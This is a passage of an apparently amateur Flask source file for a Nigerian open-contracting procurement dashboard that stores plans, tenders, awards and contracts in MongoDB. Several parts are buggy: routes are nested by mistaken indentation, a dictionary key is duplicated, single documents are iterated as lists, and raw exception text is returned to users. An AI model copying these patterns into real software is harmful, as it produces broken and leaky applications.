\"planning.scheduling.plannedcertificateobjend\": parse_datetime(\n planndcertnoobjend),\n \"planning.scheduling.biddingdocsstart\": parse_datetime(\n biddocstart),\n \"planning.scheduling.biddingdocsend\": parse_datetime(\n biddocend),\n\n \"planning.scheduling.biddingdocument\": \" \",\n\n \"planning.scheduling.plannedadvertprequal\": parse_datetime(\n preqadvertstart),\n \"planning.scheduling.plannedadvertprequalend\": parse_datetime(\n preqadvertend),\n \"planning.scheduling.plannedprequalopening\": parse_datetime(\n Prequalificationopen),\n \"planning.scheduling.plannedevalpreqalsubm\": parse_datetime(\n Prequalificationstart),\n \"planning.scheduling.plannedevalpreqalsubmend\": parse_datetime(\n Prequalificationend),\n \"planning.scheduling.plannedprequalapprov\": parse_datetime(\n Prequalificationappobjectstart),\n \"planning.scheduling.plannedprequalapprovend\": parse_datetime(\n Prequalificationappobjectend),\n \"planning.scheduling.plannedprequalpublish\": parse_datetime(\n Prequalificationpubl),\n \"planning.scheduling.plannedfirstbid\": parse_datetime(\n firstbidstart),\n \"planning.scheduling.plannedfirstbidend\": parse_datetime(\n firstbidend),\n \"planning.scheduling.plannedsecondbid\": parse_datetime(\n secondbidstart),\n \"planning.scheduling.plannedsecondbidend\": parse_datetime(\n secondbidend),\n \"planning.scheduling.plannedbidinvite\": parse_datetime(\n bidinvite),\n \"planning.scheduling.plannedbidclose\": parse_datetime(\n bidclose),\n \"planning.scheduling.plannedbidevaluation\": parse_datetime(\n bidevalrepstart),\n \"planning.scheduling.plannedbidevaluationend\": parse_datetime(\n bidevalrepend),\n \"planning.scheduling.plannedprocuringenteval\": parse_datetime(\n bidevalMDAstart),\n \"planning.scheduling.plannedprocuringentevalend\": parse_datetime(\n bidevalMDAend),\n \"planning.scheduling.plannedcertificateobjevalreport\": parse_datetime(\n certnoobjectstart),\n \"planning.scheduling.plannedcertificateobjevalreportend\": parse_datetime(\n certnoobjectend),\n \"planning.scheduling.plannedfecapproval\": parse_datetime(\n fecapprovestart),\n \"planning.scheduling.plannedfecapproval\": parse_datetime(\n fecapproveend),\n \"planning.scheduling.plannedcontractoffer\": parse_datetime(\n controfferstart),\n \"planning.scheduling.plannedcontractofferend\": parse_datetime(\n controfferend),\n \"planning.scheduling.plannedcontractsignature\": parse_datetime(\n contrsignstart),\n \"planning.scheduling.plannedcontractsignatureend\": parse_datetime(\n contrsignend),\n \"planning.scheduling.plannedmobilization\": parse_datetime(\n Mobilizationstart),\n \"planning.scheduling.plannedmobilizationend\": parse_datetime(\n Mobilizationend),\n \"planning.scheduling.plannedsubmissiondraftrep\": parse_datetime(\n draftreptstart),\n \"planning.scheduling.plannedsubmissionfinalrep\": parse_datetime(\n finalreptstart),\n \"planning.scheduling.plannedgoodsarrival\": parse_datetime(\n arrivalgoodsstart),\n \"planning.scheduling.plannedgoodsarrivalend\": parse_datetime(\n arrivalgoodsend),\n \"planning.scheduling.plannedsubstantialcomplete\": parse_datetime(\n substcomplend),\n \"planning.scheduling.plannedfinalaccept\": parse_datetime(\n finalacceptstart),\n \"planning.scheduling.plannedfinalacceptend\": parse_datetime(\n finalacceptend),\n \"planning.publishplan\": Publishplanornot,\n \"planning.justification\": plsjustify,\n \"planning.date\": datetime.datetime.strptime(today,\n \"%Y-%m-%d\")\n }\n\n })\n\n if query.modified_count is 1:\n\n message = \"\"\"Your Plan with OCID '%s' has been saved.\"\"\".replace('\\n', ' ') % (ocid)\n # return json.dumps({'message':'User created successfully !'})\n flash(message)\n return render_template('dashboard/planning.html')\n else:\n # duplicate where unique\n # return json.dumps({'error':str(data[0])})\n return render_template('dashboard/planning.html',\n error='Please review form entry, one or more entries might be in the wrong format')\n else:\n # check required fields\n # return json.dumps({'html':'Enter the required fields'})\n return render_template('dashboard/planning.html', error='Enter the correct values in the mandatory fields')\n else:\n return render_template('dashboard/planning.html',\n error='OCID/Project is invalid or does not exist. Create New Release or Open Contracting Process')\n\n\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n # return render_template('dashboard/planning.html,error = 'A Plan already exists with that OCID or OCID is invalid')\n return json.dumps({'error': str(e)})\n finally:\n db.close\n\n\n################################### START OF PLAN MODAL\n\n# retrieve plan method\n@app.route('/getPlans', methods=['POST'])\ndef getPlans():\n try:\n if session.get('user'):\n\n _user = session.get('user')\n\n _agencyName = session.get('agencyName')\n\n _offset = int(request.form['offset'])\n _limit = pageLimit\n\n releases = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).sort([('_id', -1)]).skip(\n _offset).limit(_limit)\n\n res = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).count()\n # print(res)\n\n\n\n response = []\n releases_dict = []\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n for release in releases:\n d = release['planning']['date']\n dString = d.strftime(\"%Y-%m-%d\")\n\n release_dict = {\n 'OCID': release['ocid'],\n 'planning_Description': release['planning']['identity']['description'],\n\n 'planning_Package_Number': release['planning']['identity']['package'],\n 'planning_Procurement_category': release['planning']['basicdata']['procurementcategory'],\n 'planning_Contract_type': release['planning']['basicdata']['contracttype'],\n\n 'plan_date': dString}\n\n releases_dict.append(release_dict)\n response.append(releases_dict)\n response.append({'total': res})\n\n print(json.dumps(response))\n # convert into json after converting to dictionary\n return json.dumps(response)\n\n\n\n\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n\n################################### END OF PLAN MODAL\n\n\n################################### TENDER\n\n\n# render tender form\n@app.route('/showNewTender')\ndef showNewTender():\n return render_template('dashboard/tender.html')\n\n\n# render tender view\n@app.route('/showSavedTender')\ndef showSavedTender():\n if session.get('user'):\n return render_template('dashboard/mytenders.html')\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n\n\n# add Tender\n@app.route(\"/initiate\", methods=['POST'])\ndef createNewTender():\n try:\n\n if session.get('user'):\n\n ocid = request.form.get('ocid', '')\n title = request.form.get('title', '')\n projdesc = request.form.get('projdesc', '')\n status = request.form.get('status', '')\n advertdate = request.form.get('advertdate', '')\n media = request.form.get('media', '')\n minvalue = int(request.form.get('minvalue', ''))\n procmethod = request.form.get('procmethod', '')\n rationale = request.form.get('rationale', '')\n bppletterofnoobj = request.form.get('bppletterofnoobj', '')\n awardCriteria = request.form.get('awardCriteria', '')\n awardCriteriadet = request.form.get('awardCriteriadet', '')\n tenderstart = request.form.get('tenderstart', '')\n tenderend = request.form.get('tenderend', '')\n submethod = request.form.get('submethod', '')\n submethoddet = request.form.get('submethoddet', '')\n hasenq = request.form.get('hasenq', '')\n enqperdstart = request.form.get('enqperdstart', '')\n enqperdstartend = request.form.get('enqperdstartend', '')\n haspet = request.form.get('haspet', '')\n petitionremark = request.form.get('petitionremark', '')\n eligcrit = request.form.get('eligcrit', '')\n nooftenderers = int(request.form.get('nooftenderers', ''))\n awardstart = request.form.get('awardstart', '')\n awardend = request.form.get('awardend', '')\n\n projtype = request.form.get('projtype', '')\n\n advertstart = request.form.get('advertstart', '')\n advertend = request.form.get('advertend', '')\n leadbefliststart = request.form.get('leadbefliststart', '')\n leadbeflistend = request.form.get('leadbeflistend', '')\n mdalistapprovestart = request.form.get('mdalistapprovestart', '')\n mdalistapproveend = request.form.get('mdalistapproveend', '')\n shortlistsubmission = request.form.get('shortlistsubmission', '')\n propinvitestart = request.form.get('propinvitestart', '')\n propinviteend = request.form.get('propinviteend', '')\n techpropopen = request.form.get('techpropopen', '')\n subtechEvreportstart = request.form.get('subtechEvreportstart', '')\n subtechEvreportend = request.form.get('subtechEvreportend', '')\n mdaapptechEvreportstart = request.form.get('mdaapptechEvreportstart', '')\n mdaapptechEvreportend = request.form.get('mdaapptechEvreportend', '')\n Openingfinancialpropstart = request.form.get('Openingfinancialpropstart', '')\n submissionevareportstart = request.form.get('submissionevareportstart', '')\n submissionevareportend = request.form.get('submissionevareportend', '')\n Negotiationsstart = request.form.get('Negotiationsstart', '')\n Negotiationsend = request.form.get('Negotiationsend', '')\n Negotiationappobjectstart = request.form.get('Negotiationappobjectstart', '')\n Negotiationappobjectstartend = request.form.get('Negotiationappobjectstartend', '')\n planndcertnoobjstart = request.form.get('planndcertnoobjstart', '')\n planndcertnoobjend = request.form.get('planndcertnoobjend', '')\n preqadvertstart = request.form.get('preqadvertstart', '')\n preqadvertend = request.form.get('preqadvertend', '')\n Prequalificationopen = request.form.get('Prequalificationopen', '')\n Prequalificationstart = request.form.get('Prequalificationstart', '')\n Prequalificationend = request.form.get('Prequalificationend', '')\n Prequalificationappobjectstart = request.form.get('Prequalificationappobjectstart', '')\n Prequalificationappobjectend = request.form.get('Prequalificationappobjectend', '')\n Prequalificationpubl = request.form.get('Prequalificationpubl', '')\n firstbidstart = request.form.get('firstbidstart', '')\n firstbidend = request.form.get('firstbidend', '')\n secondbidstart = request.form.get('secondbidstart', '')\n secondbidend = request.form.get('secondbidend', '')\n bidinvite = request.form.get('bidinvite', '')\n bidclose = request.form.get('bidclose', '')\n bidevalrepstart = request.form.get('bidevalrepstart', '')\n bidevalrepend = request.form.get('bidevalrepend', '')\n bidevalMDAstart = request.form.get('bidevalMDAstart', '')\n bidevalMDAend = request.form.get('bidevalMDAend', '')\n certnoobjectstart = request.form.get('certnoobjectstart', '')\n certnoobjectend = request.form.get('certnoobjectend', '')\n fecapprovestart = request.form.get('fecapprovestart', '')\n fecapproveend = request.form.get('fecapproveend', '')\n controfferstart = request.form.get('controfferstart', '')\n controfferend = request.form.get('controfferend', '')\n contrsignstart = request.form.get('contrsignstart', '')\n contrsignend = request.form.get('contrsignend', '')\n Mobilizationstart = request.form.get('Mobilizationstart', '')\n Mobilizationend = request.form.get('Mobilizationend', '')\n draftreptstart = request.form.get('draftreptstart', '')\n finalreptstart = request.form.get('finalreptstart', '')\n arrivalgoodsstart = request.form.get('arrivalgoodsstart', '')\n arrivalgoodsend = request.form.get('arrivalgoodsend', '')\n substcomplend = request.form.get('substcomplend', '')\n finalacceptstart = request.form.get('finalacceptstart', '')\n finalacceptend = request.form.get('finalacceptend', '')\n\n query = db.releases.find_one({\"ocid\": ocid})\n\n if ocid and query:\n\n # check ocid not null!\n\n if title and projdesc and projtype and nooftenderers and status and advertdate and minvalue:\n\n query = db.releases.update_one({\"ocid\": ocid},\n {\n \"$set\":\n\n {\n\n \"tender.title\": title,\n \"tender.procuringEntity.additionalIdentifiers.0.legalName\": session.get(\n 'agencyName'),\n \"tender.procuringEntity.additionalIdentifiers.0.id\": '',\n \"tender.procuringEntity.additionalIdentifiers.0.scheme\": '',\n \"tender.procuringEntity.additionalIdentifiers.contactPoint\": '',\n \"tender.procuringEntity.identifier.scheme\": '',\n \"tender.procuringEntity.identifier.id\": '',\n \"tender.procuringEntity.identifier.legalName\": session.get(\n 'agencyName'),\n \"tender.procuringEntity.identifier.address.countryName\": 'Nigeria',\n\n \"tender.description\": projdesc,\n \"tender.status\": status,\n \"tender.advertisementdate\": parse_datetime(advertdate),\n \"tender.advertmedia\": media,\n \"tender.unit.value.currency\": 'NGN',\n \"tender.unit.value.amount\": minvalue,\n \"tender.unit.value.quantity\": 1,\n \"tender.deliveryAddress\": '',\n \"tender.value.currency\": \"NGN\",\n \"tender.value.currency.amount\": minvalue,\n \"tender.procurementMethod\": procmethod,\n \"tender.rationale\": rationale,\n \"tender.bppletterofobjection\": bppletterofnoobj,\n \"tender.awardcriteria\": awardCriteria,\n \"tender.awardcriteriadetails\": awardCriteriadet,\n \"tender.tenderPeriodstart\": parse_datetime(tenderstart),\n \"tender.tenderPeriodend\": parse_datetime(tenderend),\n \"tender.submissionmethod\": submethod,\n \"tender.submissionmethoddetails\": submethoddet,\n \"tender.hasenquiries\": hasenq,\n \"tender.enquiryPeriod.startDate\": parse_datetime(\n enqperdstart),\n \"tender.enquiryPeriod.endDate\": parse_datetime(\n enqperdstartend),\n \"tender.haspetition\": haspet,\n \"tender.petitionremark\": petitionremark,\n \"tender.eligibilitycriteria\": eligcrit,\n \"tender.numberoftenderers\": nooftenderers,\n \"tender.awardPeriod.startDate\": parse_datetime(\n awardstart),\n \"tender.awardPeriod.endDate\": parse_datetime(awardend),\n\n \"tender.projtype\": projtype,\n\n \"tender.actualadvert\": parse_datetime(advertstart),\n \"tender.actualadvertend\": parse_datetime(advertend),\n \"tender.actualevaluation\": parse_datetime(\n leadbefliststart),\n \"tender.actualevaluationend\": parse_datetime(\n leadbeflistend),\n \"tender.actualshortlistapprove\": parse_datetime(\n mdalistapprovestart),\n \"tender.actualshortlistapproveend\": parse_datetime(\n mdalistapproveend),\n \"tender.actualshortlistpublish\": parse_datetime(\n shortlistsubmission),\n \"tender.actualproposalinvite\": parse_datetime(\n propinvitestart),\n \"tender.actualproposalinviteend\": parse_datetime(\n propinviteend),\n \"tender.actualopeningoftechprop\": parse_datetime(\n techpropopen),\n \"tender.actualevaluationtech\": parse_datetime(\n subtechEvreportstart),\n \"tender.actualevaluationtechend\": parse_datetime(\n subtechEvreportend),\n \"tender.actualevaluationtechapprov\": parse_datetime(\n mdaapptechEvreportstart),\n \"tender.actualevaluationtechapprovend\": parse_datetime(\n mdaapptechEvreportend),\n \"tender.actualopenfinancialprop\": parse_datetime(\n Openingfinancialpropstart),\n \"tender.actualsubmittechreport\": parse_datetime(\n submissionevareportstart),\n \"tender.actualsubmittechreportend\": parse_datetime(\n submissionevareportend),\n \"tender.actualnegotiations\": parse_datetime(\n Negotiationsstart),\n \"tender.actualnegotiationsend\": parse_datetime(\n Negotiationsend),\n \"tender.actualprocuringenteval\": parse_datetime(\n Negotiationappobjectstart),\n \"tender.actualprocuringentevalend\": parse_datetime(\n Negotiationappobjectstartend),\n \"tender.actualcertificateobj\": parse_datetime(\n planndcertnoobjstart),\n \"tender.actualcertificateobjend\": parse_datetime(\n planndcertnoobjend),\n \"tender.actualadvertprequal\": parse_datetime(\n preqadvertstart),\n \"tender.actualadvertprequalend\": parse_datetime(\n preqadvertend),\n \"tender.actualprequalopening\": parse_datetime(\n Prequalificationopen),\n \"tender.actualevalpreqalsubm\": parse_datetime(\n Prequalificationstart),\n \"tender.actualevalpreqalsubmend\": parse_datetime(\n Prequalificationend),\n \"tender.actualprequalapprov\": parse_datetime(\n Prequalificationappobjectstart),\n \"tender.actualprequalapprovend\": parse_datetime(\n Prequalificationappobjectend),\n \"tender.actualprequalpublish\": parse_datetime(\n Prequalificationpubl),\n \"tender.actualfirstbid\": parse_datetime(firstbidstart),\n \"tender.actualfirstbidend\": parse_datetime(firstbidend),\n \"tender.actualsecondbid\": parse_datetime(secondbidstart),\n \"tender.actualsecondbidend\": parse_datetime(\n secondbidend),\n \"tender.actualbidinvite\": parse_datetime(bidinvite),\n \"tender.actualbidclose\": parse_datetime(bidclose),\n \"tender.actualbidevaluation\": parse_datetime(\n bidevalrepstart),\n \"tender.actualbidevaluationend\": parse_datetime(\n bidevalrepend),\n \"tender.actualprocuringenteval\": parse_datetime(\n bidevalMDAstart),\n \"tender.actualprocuringentevalend\": parse_datetime(\n bidevalMDAend),\n \"tender.actualcertificateobjevalreport\": parse_datetime(\n certnoobjectstart),\n \"tender.actualcertificateobjevalreportend\": parse_datetime(\n certnoobjectend),\n \"tender.actualfecapproval\": parse_datetime(\n fecapprovestart),\n \"tender.actualfecapprovalend\": parse_datetime(\n fecapproveend),\n \"tender.actualcontractoffer\": parse_datetime(\n controfferstart),\n \"tender.actualcontractofferend\": parse_datetime(\n controfferend),\n \"tender.actualcontractsignature\": parse_datetime(\n contrsignstart),\n \"tender.actualcontractsignatureend\": parse_datetime(\n contrsignend),\n \"tender.actualmobilization\": parse_datetime(\n Mobilizationstart),\n \"tender.actualmobilizationend\": parse_datetime(\n Mobilizationend),\n \"tender.actualsubmissiondraftrep\": parse_datetime(\n draftreptstart),\n \"tender.actualsubmissionfinalrep\": parse_datetime(\n finalreptstart),\n \"tender.actualgoodsarrival\": parse_datetime(\n arrivalgoodsstart),\n \"tender.actualgoodsarrivalend\": parse_datetime(\n arrivalgoodsend),\n \"tender.actualsubstantialcomplete\": parse_datetime(\n substcomplend),\n \"tender.actualfinalaccept\": parse_datetime(\n finalacceptstart),\n \"tender.actualfinalacceptend\": parse_datetime(\n finalacceptend)\n\n }\n })\n\n if query.modified_count is 1:\n\n message = \"\"\"Your Tender with OCID '%s' has been saved.\"\"\".replace('\\n', ' ') % (ocid)\n # return json.dumps({'message':'User created successfully !'})\n flash(message)\n return render_template('dashboard/tender.html')\n else:\n # duplicate where unique\n # return json.dumps({'error':str(data[0])})\n return render_template('dashboard/tender.html', error='Please review form entry')\n else:\n # check required fields\n # return json.dumps({'html':'Enter the required fields'})\n return render_template('dashboard/tender.html',\n error='Enter the required values in the right format in the required fields')\n\n\n else:\n return render_template('dashboard/tender.html',\n error='OCID/Project is invalid or does not exist. Create New Release or Open Contracting Process')\n\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n # return render_template('dashboard/tender.html,error = 'A Tender already exists with that OCID or OCID is invalid')\n\n return json.dumps({'error': str(e)})\n finally:\n db.close\n\n\n################################### START OF TENDER MODAL\n\n# retrieve tender method\n@app.route('/getTenders', methods=['POST'])\ndef getTenders():\n try:\n if session.get('user'):\n\n _user = session.get('user')\n\n _agencyName = session.get('agencyName')\n\n _offset = int(request.form['offset'])\n _limit = pageLimit\n\n releases = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).sort([('_id', -1)]).skip(\n _offset).limit(_limit)\n\n res = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).count()\n # print(res)\n\n\n\n response = []\n releases_dict = []\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n\n\n\n # looping through each query output\n for release in releases:\n d = release['tender']['advertisementdate']\n # collecting year, month and dat from ISO date format\n dString = d.strftime(\"%Y-%m-%d\")\n\n release_dict = {\n 'OCID': release['ocid'],\n 'tender_Description': release['tender']['description'],\n 'Number_of_tenderers': release['tender']['numberoftenderers'],\n 'tender_status': release['tender']['status'],\n 'advert_date': dString,\n 'estimated_cost': release['tender']['value']['amount']}\n\n releases_dict.append(release_dict)\n response.append(releases_dict)\n response.append({'total': res})\n\n print(json.dumps(response))\n # convert into json after converting to dictionary\n return json.dumps(response)\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n\n# get particular tender information\n@app.route('/getTenderById', methods=['POST'])\ndef getTenderById():\n try:\n if session.get('user'):\n\n _id = request.form['id']\n\n # pymongo projection - fields\n releases = db.releases.find_one({\"ocid\": _id})\n\n response = []\n releases_dict = []\n\n for rel in releases:\n release_dict = {\n 'tender_status': rel['tender']['status']\n\n }\n releases_dict.append(release_dict)\n response.append(releases_dict)\n\n print(json.dumps(response))\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n\n return json.dumps(response)\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n\n# update tender\n@app.route('/updateTender', methods=['POST'])\ndef updateTender():\n try:\n if session.get('user'):\n _status = request.form['status']\n _release_id = request.form['id']\n\n # print(_release_id+\" --------\")\n\n\n #####TO DO\n ###THIS SHOULD UPDATE ALL TAGS IN ALL STAGES\n\n query = db.releases.update_one({\"ocid\": _release_id},\n {\n \"$set\":\n {\n \"tender.status\": _status\n\n }\n\n })\n\n if query.modified_count is 1:\n\n return json.dumps({'status': 'OK'})\n else:\n return json.dumps({'status': 'ERROR'})\n except Exception as e:\n return json.dumps({'status': 'Unauthorized access'})\n finally:\n db.close\n\n # get particular contractor information\n @app.route('/getContractorById', methods=['POST'])\n def getContractorById():\n try:\n if session.get('user'):\n\n _id = int(request.form['id'])\n\n print(_id)\n # pymongo projection - fields\n contractors = db.registeredcontractors.find_one({\"BPP_Contractor_ID\": _id})\n\n # for rel in releases['releases']:\n # print(rel['tag'][0])\n\n\n response = []\n releases_dict = []\n\n # print(contractors['BPP_Contractor_ID'])\n\n release_dict = {\n 'BPP_ID': contractors['BPP_Contractor_ID'],\n 'Company_Name': contractors['Full_Registered_Company_Name'],\n 'CAC_Number': contractors['CACRegistrationNumber']\n }\n releases_dict.append(release_dict)\n response.append(releases_dict)\n\n print(json.dumps(response))\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n\n return json.dumps(response)\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n # add tenderer to tender record\n\n # update tender\n @app.route('/newTenderer', methods=['POST'])\n def newTenderer():\n try:\n if session.get('user'):\n bppid = int(request.form['BPP_ID'])\n _release_id = request.form['id']\n\n # print(_release_id+\" --------\")\n\n\n\n query = db.releases.update_one({\"ocid\": _release_id},\n {\n \"$push\":\n {\n \"tender.tenderers\": bppid\n\n }\n\n })\n\n if query.modified_count is 1:\n\n return json.dumps({'status': 'OK'})\n else:\n return json.dumps({'status': 'ERROR'})\n except Exception as e:\n return json.dumps({'status': 'Unauthorized access'})\n finally:\n db.close\n\n\n\n ################################### END OF TENDER MODAL\n\n\n\n\n\n\n ################################### AWARD\n\n # render award form\n\n @app.route('/showNewAward')\n def showNewAward():\n return render_template('dashboard/award.html')\n\n # render award view\n @app.route('/showSavedAward')\n def showSavedAward():\n\n if session.get('user'):\n return render_template('dashboard/myawards.html')\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n\n # new award\n @app.route(\"/addAward\", methods=['POST'])\n def addAward():\n\n try:\n\n if session.get('user'):\n\n ocid = request.form.get('ocid', '')\n title = request.form.get('title', '')\n awardrefno = request.form.get('awardrefno', '')\n projdesc = request.form.get('projdesc', '')\n status = request.form.get('status', '')\n bppref = request.form.get('bppref', '')\n bppnodate = request.form.get('bppnodate', '')\n procappdate = request.form.get('procappdate', '')\n awarddate = request.form.get('awarddate', '')\n value = int(request.form['value'])\n\n Awardee = request.form.get('Awardee', '')\n\n bppno = int(request.form['bppno'])\n\n print(bppno)\n contdetails = request.form.get('contdetails', '')\n contractstart = request.form.get('contractstart', '')\n contractend = request.form.get('contractend', '')\n lowestbid = request.form.get('lowestbid', '')\n justify = request.form.get('justify', '')\n\n _agencyName = session.get('agencyName')\n\n query = db.releases.find_one({\"ocid\": ocid})\n\n if ocid and query:\n\n # check ocid not null!\n\n if bppref and Awardee and bppno and value and lowestbid:\n\n query = db.releases.update_one({\"ocid\": ocid},\n {\n \"$set\":\n\n {\n\n \"awards\": [{\n \"status\": status,\n \"description\": projdesc,\n \"title\": title,\n \"reference\": awardrefno,\n \"date\": parse_datetime(awarddate),\n \"id\": ocid,\n \"items\": [{\"unit\":\n {\"name\": \"Items\",\n \"value\": {\"currency\": \"NGN\",\n \"amount\": value}},\n \"id\": ocid,\n \"classification\": {\"scheme\": \"\",\n \"id\": \"\"},\n \"quantity\": 1}],\n\n \"suppliers\": [{\"additionalIdentifiers\": [\n {\"legalName\": Awardee}],\n \"identifier\": {\"scheme\": \"\",\n \"id\": \"\",\n \"legalName\": Awardee},\n \"name\": Awardee, \"bppNo\": bppno}],\n \"id\": ocid,\n \"value\": {\"currency\": \"NGN\", \"amount\": value},\n \"bppcertificateofobjectionnumber\": bppref,\n \"bppcertificateofobjectiondate\": parse_datetime(\n bppnodate),\n \"procuringentityapprovaldate\": parse_datetime(\n procappdate),\n \"contractdetails\": contdetails,\n \"contractPeriod.startDate\": parse_datetime(\n contractstart),\n \"contractPeriod.endDate\": parse_datetime(\n contractend),\n \"lowestbidder\": lowestbid,\n \"justification\": justify\n }]\n\n }\n })\n\n if query.modified_count is 1:\n\n message = \"\"\"Award with OCID '%s' has been saved.\"\"\".replace('\\n', ' ') % (ocid)\n # return json.dumps({'message':'User created successfully !'})\n flash(message)\n return render_template('dashboard/award.html')\n else:\n # duplicate where unique\n # return json.dumps({'error':str(data[0])})\n return render_template('dashboard/award.html', error='Please review form entry')\n else:\n # check required fields\n # return json.dumps({'html':'Enter the required fields'})\n return render_template('dashboard/award.html',\n error='Enter the required values in the right format in the required fields')\n\n\n else:\n return render_template('dashboard/award.html',\n error='OCID/Project is invalid or does not exist. Create New Release or Open Contracting Process')\n\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n # return render_template('dashboard/tender.html,error = 'A Tender already exists with that OCID or OCID is invalid')\n\n return json.dumps({'error': str(e)})\n finally:\n db.close\n\n ################################### START OF AWARD MODAL\n\n\n # retrieve awards method\n @app.route('/getAwards', methods=['POST'])\n def getAwards():\n try:\n if session.get('user'):\n\n _user = session.get('user')\n\n _agencyName = session.get('agencyName')\n\n _offset = int(request.form['offset'])\n _limit = pageLimit\n\n releases = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).sort([('_id', -1)]).skip(\n _offset).limit(_limit)\n\n res = db.releases.find({\"buyer.identifier.legalName\": _agencyName}).count()\n # print(res)\n\n\n\n\n response = []\n releases_dict = []\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n for release in releases:\n d = release['awards']['date']\n dString = d.strftime(\"%Y-%m-%d\")\n\n release_dict = {\n 'OCID': release['ocid'],\n 'award_Description': release['awards']['description'],\n 'reference': release['awards']['reference'],\n 'award_status': release['awards']['status'],\n 'award_date': dString,\n 'value': release['awards']['value']['amount']}\n\n releases_dict.append(release_dict)\n response.append(releases_dict)\n response.append({'total': res})\n\n print(json.dumps(response))\n # convert into json after converting to dictionary\n return json.dumps(response)\n\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n # get particular award information\n @app.route('/getAwardById', methods=['POST'])\n def getAwardById():\n try:\n if session.get('user'):\n\n _id = request.form['id']\n\n # pymongo projection - fields\n releases = db.releases.find_one({\"ocid\": _id})\n\n response = []\n releases_dict = []\n\n for rel in releases:\n release_dict = {\n 'award_status': rel['awards']['status']\n\n }\n releases_dict.append(release_dict)\n response.append(releases_dict)\n\n print(json.dumps(response))\n\n # parse the data (python list) and convert it into a dictionary so that it's easy to return as JSON\n\n return json.dumps(response)\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n except Exception as e:\n return render_template('dashboard/error.html', error=str(e))\n\n # update award\n @app.route('/updateAward', methods=['POST'])\n def updateAward():\n try:\n if session.get('user'):\n _status = request.form['status']\n _release_id = request.form['id']\n\n # print(_release_id+\" --------\")\n\n\n #####TO DO\n ###THIS SHOULD UPDATE ALL TAGS IN ALL STAGES\n\n query = db.releases.update_one({\"ocid\": _release_id},\n {\n \"$set\":\n {\n \"awards.status\": _status\n\n }\n\n })\n\n if query.modified_count is 1:\n\n return json.dumps({'status': 'OK'})\n else:\n return json.dumps({'status': 'ERROR'})\n except Exception as e:\n return json.dumps({'status': 'Unauthorized access'})\n finally:\n db.close\n\n\n\n\n\n\n\n\n ################################### END OF AWARD MODAL\n\n ################################### CONTRACT\n # render contract form\n @app.route('/showNewContract')\n def showNewContract():\n return render_template('dashboard/contract.html')\n\n # render contract view\n @app.route('/showSavedContract')\n def showSavedConract():\n\n if session.get('user'):\n return render_template('dashboard/mycontracts.html')\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n\n # new contract\n @app.route(\"/addContract\", methods=['POST'])\n def addContract():\n\n try:\n\n if session.get('user'):\n\n ocid = request.form.get('ocid', '')\n contref = request.form.get('contref', '')\n title = request.form.get('title', '')\n projdesc = request.form.get('projdesc', '')\n status = request.form.get('status', '')\n signeddate = request.form.get('signeddate', '')\n contractstart = request.form.get('contractstart', '')\n contractend = request.form.get('contractend', '')\n\n street = request.form.get('street', '')\n city = request.form.get('city', '')\n state = request.form.get('state', '')\n Country = request.form.get('Country', '')\n\n stringAddress = [street, city, state, Country]\n\n g = geocoder.google(\",\".join(stringAddress))\n latitude = g.lat\n longitude = g.lng\n\n _agencyName = session.get('agencyName')\n\n query = db.releases.find_one({\"ocid\": ocid})\n\n if ocid and query:\n\n # check ocid not null!\n\n if contref and street and city and Country:\n\n query = db.releases.update_one({\"ocid\": ocid},\n {\n \"$set\":\n\n {\n\n \"contracts\": [{\n \"status\": status,\n \"documents\": [\n {\"id\": ocid, \"language\": language}],\n \"description\": projdesc,\n \"title\": title,\n \"reference\": contref,\n \"implementation\":\n {\"milestones\": [{\"status\": \"\",\n \"documents\": [{\"id\": \"\",\n \"language\": language}],\n \"dateModified\": \"\",\n \"id\": ocid,\n \"dueDate\": \"\"}]},\n \"providerOrganization\":\n {\"scheme\": \"\", \"id\": \"\",\n \"legalName\": _agencyName},\n \"items\": [{\"unit\": {\"name\": \"\",\n \"value\": {\"currency\": \"NGN\",\n \"amount\": 0}},\n \"id\": ocid,\n \"classification\": {\"scheme\": \"\",\n \"id\": \"\"},\n \"quantity\": 1}],\n \"awardID\": ocid,\n \"id\": ocid,\n \"signeddate\": parse_datetime(signeddate),\n \"period\": {\n \"startDate\": parse_datetime(contractstart),\n \"endDate\": parse_datetime(contractend)},\n \"dueDate\": parse_datetime(contractend),\n \"projectlocation\": {\n \"streetaddress\": street,\n \"city\": city,\n \"state\": state,\n \"country\": Country\n }\n }]\n\n }\n })\n\n # update array\n #####delete from array\n # db.releases.update({\"ocid\":\"OCDS-2016-UNIBEN2016359-22-54-45\"},{\"$pull\":{\"contracts.projectlocation.coord\":6.334986}});\n\n\n\n query = db.releases.update_one({\"ocid\": ocid},\n {\n \"$push\":\n {\n \"contracts.projectlocation.coord\": longitude\n\n }\n\n })\n\n query = db.releases.update_one({\"ocid\": ocid},\n {\n \"$push\":\n {\n \"contracts.projectlocation.coord\": latitude\n\n }\n\n })\n\n if query.modified_count is 1:\n\n message = \"\"\"Contract with OCID '%s' has been saved.\"\"\".replace('\\n', ' ') % (ocid)\n # return 